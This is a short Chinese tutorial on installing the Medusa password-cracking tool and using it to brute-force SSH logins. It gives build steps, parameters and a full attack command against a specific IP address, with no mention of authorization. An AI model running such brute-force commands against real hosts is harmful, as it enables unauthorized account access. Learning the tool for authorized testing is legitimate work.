medusa安装和简单使用

楚瑞

2023-12-01

medusa安装和简单使用

1、手动编译安装medusa
yum install openssl-devel libssh2-devel -y #安装依赖包

tar zxvf medusa-2.2.tar.gz

cd medusa-2.2/
./configure && make -j 4 && make install

2、medusa参数说明：
-H [File] 包含目标主机名称或者IP的文件
-U [File] 包含测试的用户名文件
-p[File] 包含测试的密码文件
-O[File] 日志信息文件，保存暴力破解的结果
-M[text] 模块执行名称
-t[num] 设定线程数量
-n[num] Use for non-default TCP port number 指定非22端口号，默认22

3、爆破ssh
通过文件来指定 host 和 user，host.txt 为目标主机名称或者 IP 地址，user.txt 指定需要暴力破解的用户名，使用 wordlist.txt 字典进行暴破。

head -n 20 wordlist.txt > b.txt #取 20 个密码，放到 b.txt。如果直 接使用这个字典，用时太长了
echo 123456 >> b.txt #写入正确的密码
echo 219.143.129.64 > /root/host.txt #指定暴破的 IP，一行一个。
vim /root/users.txt #插入以下多个用户
medusa -M ssh -H ./host.txt -U ./users.txt -t 8 -P b.txt -O hack.log
破解成功后会显示 success 字样，并将暴解的结果放到 hack.log 中

medusa安装和简单使用

medusa安装和简单使用

相关阅读

相关文章

相关问答

相关文档